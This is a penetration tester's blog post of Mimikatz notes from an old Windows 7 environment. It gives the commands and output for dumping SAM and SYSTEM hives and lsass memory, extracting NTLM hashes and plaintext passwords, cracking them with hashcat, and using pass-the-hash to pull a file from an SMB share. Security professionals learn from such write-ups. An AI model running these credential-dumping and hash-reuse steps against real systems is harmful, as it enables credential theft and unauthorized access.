Mimikatz

Mimikatz allows users to view and save authentication credentials like Kerberos tickets and Windows credentials. It’s freely available via Github. This post is not a tutorial on how to use Mimikatz, it lists the commands that I recently had to use during an assignment in an old Windows 7 environment.

Workflow : From registry

Use Case

1. Dump hashes from registry;
2. Use this dump offline to extract the hashes with Mimikatz;
3. Crack the hashes with hashcat.

Because most unaltered versions of Mimikatz are blocked by the antivirus, you can not always extract the passwords from memory on the victim machine. To overcome this problem you have to export two registry files, then copy these files to a machine under your control and do the remainder of the work on this machine.

Note that (espc. within the Windows domain) you do not always need the password, sometimes you can just re-use the hash. However sometimes you need the password to access a specific service that is linked to AD-authentication but has its own very strict lock-out policy.

Dump hives from registry

We need to export two registry hives. You need to be (local) administrator to run these commands

C:\Users\me\Desktop>reg save hklm\sam sam.hiv
The operation completed successfully.

C:\Users\me\Desktop>reg save hklm\system system.hiv
The operation completed successfully.

This gives you the two necessary registry files. If the registry files are in use you can use the last copies that are stored in the Volume Shadow Copy.

C:\Users\me\Desktop>vssadmin list shadows

   Contained 1 shadow copies at creation time: 3/7/2019 7:46:39 PM

Based on the above output you can then find (adjust the path with the latest shadow copy creation time) the copies in \\localhost\C$\@GMT-2019.03.07-18.46.39

Mimikatz

Now start Mimikatz and set the Administrator privileges

privilege::debug

To keep track of all your commands (and their output) you should enable logging.

log mimi_cudeso.log

Now run the lsadump command in offline mode.

mimikatz # lsadump::sam /sam:sam.hiv /system:system.hiv

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0

RID  : 000001f5 (501)
User : Guest

RID  : 000003eb (1003)
User : test
  Hash NTLM: a2345375a47a92754e2505132aca194b

RID  : 000003ec (1004)
User : test2
  Hash NTLM: f0873f3268072c7b1150b15670291137

Notice the hash for the Administrator (31d6cfe0d16ae931b73c59d7e0c089c0). This exact hash indicates the local admin account has been disabled. In this case we want to use the hashes for user test and user test2. Copy and paste the Hash NTLM value into a text file.

Hashcat

Next we have to run Hashcat to crack the passwords. This can take a very long time and should only be run on dedicated hardware (read the FAQ for more insight). For this example I used a small dictionary. You can find more dictionaries at packetstormsecurity and md5this. We start hashcat with these options

• -m 1000 : set the hash-type to NTLM ;
• -a 0 : use a dictionary as attack mode ;
• –force : ignore errors for running it on non-ideal hardware

The output (redacted below) of the hashcat command then gives you the found passwords.

a2345375a47a92754e2505132aca194b:windows
f0873f3268072c7b1150b15670291137:linux

Session..........: hashcat
Status...........: Cracked
Hash.Type........: NTLM
Hash.Target......: hash.txt
Candidates.#1....: computer -> keyboard

Workflow : From memory

Another method for obtaining passwords (on Windows 7 and if kb2871997 is not applied) is by reading out the plain text passwords from memory. To do this you need to dump the lsass process.

Dump the process

There are different ways for dumping the memory of a process. One way is via the Windows Task Manager.

• Start the Task Manager;
• Search for the process lsass.exe;
• Right click and choose ‘Create Dump file’.

Mimikatz

Again start Mimikatz.

privilege::debug

Instead of using the offline lsadump we now use sekurlsa. In the output (redacted below) you can see that Mimikatz displays the clear text password found from memory.

mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'

mimikatz # sekurlsa::logonPasswords
Opening : 'lsass.dmp' file for minidump...

Authentication Id : 0 ; 1081762 (00000000:001081a2)
Session           : Interactive from 1
User Name         : test
Domain            : WIN7
Logon Server      : WIN7
...
         * Username : test
         * Domain   : WIN7
         * Password : secretpassword

Pass-the-Hash

On older systems you can use the pass-the-hash technique to get access to the files. On Kali do this to list the shares.

root@kali:~# pth-smbclient --pw-nt-hash -L 192.168.218.210 --user=test \\\\192.168.218.210\\c$ a2345375a47a92754e2505132aca194b

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	Quarantine      Disk      Test Quarantine
	Users           Disk
Reconnecting with SMB1 for workgroup listing.
Connection to 192.168.218.210 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available

We want to explore what’s hidden in the quarantine share.

root@kali:~# pth-smbclient --pw-nt-hash --user=test \\\\192.168.218.210\\Quarantine a2345375a47a92754e2505132aca194b
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Nov 16 16:25:12 2016
  ..                                  D        0  Wed Nov 16 16:25:12 2016
  CompanySecrets.txt                  A     4202  Wed Nov 16 18:41:33 2016
  Stinger                             D        0  Wed Nov 16 15:33:36 2016

		8362081 blocks of size 4096. 501817 blocks available
smb: \> get CompanySecrets.txt
getting file \CompanySecrets.txt of size 4202 as CompanySecrets.txt (1025.9 KiloBytes/sec) (average 1025.9 KiloBytes/sec)